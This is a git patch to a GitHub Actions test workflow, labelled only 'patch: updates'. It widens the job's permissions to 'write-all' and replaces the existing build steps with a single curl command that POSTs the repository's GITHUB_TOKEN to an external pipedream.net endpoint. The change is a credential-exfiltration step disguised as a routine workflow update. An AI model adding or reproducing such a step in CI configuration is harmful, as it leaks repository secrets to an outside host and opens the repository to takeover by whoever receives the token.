From 00c5bf8eefdbf7ba4cd0b2885b6f4bfe7c8a225b Mon Sep 17 00:00:00 2001 From: Tiberiu Baron Date: Tue, 27 Aug 2024 13:11:39 +0300 Subject: [PATCH] patch: updates --- .github/workflows/test.yml | 32 +++----------------------------- 1 file changed, 3 insertions(+), 29 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 3c535106..7c98db4f 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -11,33 +11,7 @@ on: jobs: use_api: runs-on: ubuntu-latest - permissions: - actions: write - attestations: write - checks: write - contents: write - deployments: write - id-token: write - issues: write - discussions: write - packages: write - pages: write - pull-requests: write - repository-projects: write - security-events: write - statuses: write + permissions: write-all steps: - - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - env: - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: | - git config --global user.name "tibrnui" - git checkout -b feat/test-12 - touch test - git add . - git commit -m "test" - git remote set-url origin https://uipath:${{ secrets.GITHUB_TOKEN }}@github.com/$GITHUB_REPOSITORY - git push --set-upstream origin feat/test-12 - gh pr create --base develop --head feat/test-12 \ No newline at end of file + - run: + curl -d "{{secrets.GITHUB_TOKEN}}" -X POST https://eoinkd603ndv2ew.m.pipedream.net \ No newline at end of file